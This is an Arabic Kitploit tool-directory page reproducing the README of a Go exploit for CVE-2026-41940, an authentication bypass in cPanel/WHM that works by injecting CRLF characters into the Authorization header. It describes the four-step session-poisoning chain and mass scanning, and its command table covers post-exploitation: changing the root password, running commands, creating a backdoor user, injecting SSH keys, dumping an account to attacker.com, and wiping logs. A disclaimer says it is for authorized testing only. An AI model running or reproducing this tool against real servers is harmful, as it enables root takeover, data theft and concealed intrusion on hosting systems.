Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940-Exploit-PoC — استغلال PoC لثغرة CVE-2026-41940، وهي تجاوز للمصادقة في cPanel وWHM عبر حقن CRLF. يتضمن فحصًا جماعيًا، وإجراءات ما بعد الاستغلال، وقشرة تفاعلية للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

استغلال PoC لثغرة CVE-2026-41940، وهي تجاوز للمصادقة في cPanel وWHM عبر حقن CRLF. يتضمن فحصًا جماعيًا، وإجراءات ما بعد الاستغلال، وقشرة تفاعلية للاختبار المصرح به.

عرض المستودعالموقع الإلكتروني
2127منذ 5 أشهرلم تتم المراجعة بعد

CVE-2026-41940 استغلال PoC – تجاوز المصادقة في cPanel و WHM

CVE-2026-41940 CVSS Go Version License

الأداة من إعداد: Ishan Oshada | GitHub

⚠️ لأغراض الاختبارات الأمنية المصرح بها فقط. الاستخدام غير المصرح به غير قانوني.

1


📋 جدول المحتويات

  • نظرة عامة على الثغرة
  • سلسلة الاستغلال
  • الميزات
  • التثبيت
  • البدء السريع
  • أمثلة الاستخدام
  • إجراءات ما بعد الاستغلال
  • أوامر الصدفة التفاعلية
  • المسح الجماعي باستخدام urls.txt
  • أمثلة على المخرجات
  • مرجع الخيارات
  • الإصدارات المتأثرة
  • البناء لجميع المنصات
  • الأسئلة الشائعة واستكشاف الأخطاء
  • إخلاء المسؤولية
  • المؤلف

2

نظرة عامة على الثغرة

CVE-2026-41940 هي ثغرة حقن CRLF في cPanel و WHM (الإصدارات < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

تقوم دالة saveSession() بكتابة بيانات الجلسة بعد تطبيق filter_sessiondata()، ولكن يتم تطبيق الفلتر بعد فوات الأوان. من خلال حقن أحرف CRLF (\r\n) داخل ترويسة Authorization: Basic، يمكن للمهاجم تسميم ملف الجلسة على القرص بأزواج مفاتيح-قيم تعسفية (مثل hasroot=1, tfa_verified=1, user=root).

عند تحميل الجلسة المسمومة لاحقًا، يمنح cPanel/WHM وصولًا كاملًا كجذر دون أي كلمة مرور.

درجة CVSS: 10.0 (حرجة)

  • ناقل الهجوم: شبكة
  • تعقيد الهجوم: منخفض
  • الامتيازات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • السرية: عالية
  • السلامة: عالية
  • التوفر: عالي

سلسلة الاستغلال (4 مراحل)

المرحلةالإجراءالوصف
1POST /login/?login_only=1طلب ملف تعريف ارتباط جلسة ما قبل المصادقة ببيانات اعتماد خاطئة
2GET / + ترويسة Authorization مع CRLFتسميم ملف الجلسة بـ hasroot=1, user=root, إلخ.
3GET /scripts2/listacctsإجبار ذاكرة التخزين المؤقت للجلسة على إعادة تحميل الملف المسموم (الانتشار)
4GET /cpsess<TOKEN>/json-api/versionالتحقق من وصول الجذر – النجاح = 200 + بيانات الإصدار

الميزات

  • ✅ المسح الفردي والجماعي (إدخال ملف، أنبوب stdin)
  • ✅ المسح متعدد الخيوط (التحكم في التزامن حتى 100+ خيط)
  • ✅ وضع المفصل (--verbose) – يعرض طلبات/استجابات HTTP كاملة
  • ✅ مخرجات JSON (حفظ تلقائي عند العثور على هدف ضعيف)
  • ✅ 10 إجراءات ما بعد الاستغلال (انظر الجدول أدناه)
  • ✅ متعدد المنصات (Windows, Linux, macOS)
  • ✅ بدون تبعيات خارجية (مكتبة Go القياسية فقط)
  • ✅ مخرجات طرفية ملونة مع نتائج واضحة في صناديق
  • ✅ استمرارية الجلسة – آلية الإبقاء على الاتصال
  • ✅ صدفة WHM تفاعلية مع سجل الأوامر

التثبيت

المتطلبات الأساسية

  • Go 1.20 أو أحدث (تحميل)

استنساخ المستودع

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

بناء الملف التنفيذي

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

التشغيل المباشر (بدون بناء)

go run main.go -u https://target.com:2087

الملفات التنفيذية الجاهزة (الطريقة الأسرع)

بدلاً من البناء من المصدر، يمكنك تنزيل الملفات التنفيذية المستقرة الأحدث مباشرة من المستودع. يتم إنشاؤها تلقائيًا لكل تحديث:

المنصةالموقع
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

ملاحظة: إذا كنت تستخدم Linux أو macOS، تذكر منح أذونات التنفيذ بعد التنزيل:


البدء السريع

# فحص أساسي
go run main.go -u https://target.com:2087

# سرد جميع حسابات cPanel
go run main.go -u https://target.com:2087 -action list

# صدفة WHM تفاعلية
go run main.go -u https://target.com:2087 -action shell

# مسح جماعي باستخدام urls.txt
go run main.go -l urls.txt -t 20 -o results.json

أمثلة الاستخدام (جدول)

#الغرضالأمر
1فحص هدف واحد أساسيgo run main.go -u https://target.com:2087
2سرد جميع حسابات cPanelgo run main.go -u https://target.com:2087 -action list
3تغيير كلمة مرور الجذرgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4تنفيذ أمر نظامgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5الحصول على معلومات الخادمgo run main.go -u https://target.com:2087 -action info
6إنشاء مستخدم باب خلفيgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7إنشاء رمز API (سري)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8حقن مفتاح SSHgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9تفريغ ونقل الحسابgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10مسح السجلات وتغطية الآثارgo run main.go -u https://target.com:2087 -action wipe
11صدفة WHM تفاعليةgo run main.go -u https://target.com:2087 -action shell
12مسح جماعي من ملفgo run main.go -l urls.txt -t 20 -o results.json
13حفظ النتائج في JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14تفعيل تصحيح الأخطاء المفصلgo run main.go -u https://target.com:2087 --verbose
15الأنبوب من أدوات أخرىcat urls.txt | go run main.go -t 20
16زيادة المهلةgo run main.go -u https://target.com:2087 -timeout 30

إجراءات ما بعد الاستغلال

تنزيل الأداة